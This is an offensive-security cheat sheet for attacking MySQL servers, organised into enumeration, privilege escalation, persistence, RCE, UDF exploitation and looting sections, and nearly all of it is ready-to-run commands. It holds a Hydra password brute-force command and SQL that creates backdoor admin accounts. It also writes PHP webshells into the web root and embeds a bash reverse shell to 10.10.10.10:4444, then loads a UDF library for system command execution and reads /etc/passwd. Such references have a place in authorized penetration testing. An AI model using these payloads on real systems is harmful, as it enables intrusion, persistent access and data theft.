
🐬 MySQL Pentesting ​

🔍 Enum ​

bash
# Nmap scripts
nmap -p 3306 --script mysql-* <target>

# Hydra brute-force
hydra -l root -P rockyou.txt mysql://<target>
sql
SELECT VERSION();               -- Server version
SELECT USER();                  -- Current user
SELECT DATABASE();              -- Current database
SHOW DATABASES;                 -- List databases
SHOW TABLES;                    -- List tables
SELECT user FROM mysql.user;    -- List mysql users

-- System variables (not statements on their own; read them with SELECT @@name;)
@@version_compile_os            -- Lin/Win/Mac
@@version_compile_machine       -- x86/x86_64/ARM
@@plugin_dir                    -- Path to plugin dir

💻 Command ​

The `mysql` client command can be replaced with `mariadb`.

bash
# -p without a value prompts for the password interactively
mysql -u username -p

# Execute commands
# NOTE: a password given on the command line (-p'' or --password=...) is
# visible in process listings and shell history; prefer the interactive
# prompt or a permission-restricted option file.
mysql -u username -p'' database_name -e "show databases;"

# Execute commands via a file
echo 'show tables;' > example.sql
mysql -u username --password='password' database_name -v < example.sql

# Read arbitrary files
mysql -u username --password='password' database_name -v < /etc/passwd

# Remote DB (-h <host>, -P <port>)
mysql -u username -p -h <host> -P 3306

# Specify database (-D)
mysql -u username -p -h <target-ip> -D database_name

🚀 PrivEsc ​

sql
-- Check privileges
SHOW GRANTS FOR CURRENT_USER;

-- Try to enable FILE writes
GRANT FILE ON *.* TO 'username'@'%';

-- Create admin user
CREATE USER 'hacker'@'%' IDENTIFIED BY 'pwned';
GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' WITH GRANT OPTION;

🔒 Persistence ​

sql
-- Create user with super privileges
CREATE USER management@'%' IDENTIFIED BY 'toor';
GRANT SUPER, PROCESS, FILE ON *.* TO management@'%';

-- Add to mysql.user manually (dangerous, requires FILE privilege)
INSERT INTO mysql.user (Host, User, authentication_string, ssl_cipher, x509_issuer, x509_subject)
VALUES ('%', 'ghost', PASSWORD('rooted'), '', '', '');

💥 RCE ​

sql
-- Webshell via OUTFILE
SHOW VARIABLES LIKE 'secure_file_priv'; -- Show right

UNION ALL SELECT 1,2,3,4,"<?php system($_GET['c']);?>",6 into OUTFILE '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']);?>" INTO OUTFILE '/var/www/html/shell.php';
sql
-- Command Injection trick
UPDATE users SET email='x'||system('bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"') WHERE id=1;

🐬 MySQL UDF exploit ​

sql
-- For Linux
USE mysql;
SHOW variables like '%plugin%';
create table foo(line blob);
insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from foo into dumpfile '<Plugin-Directory>/raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
select * from mysql.func;

SELECT do_system('id');

This can be used for privilege escalation; see exploit-db (MySQL UDF PE).

📂 Looting ​

sql
-- Read local files
SELECT LOAD_FILE('/etc/passwd');

-- Dump data from a table
SELECT * FROM sensitive_table INTO OUTFILE '/tmp/dump.txt';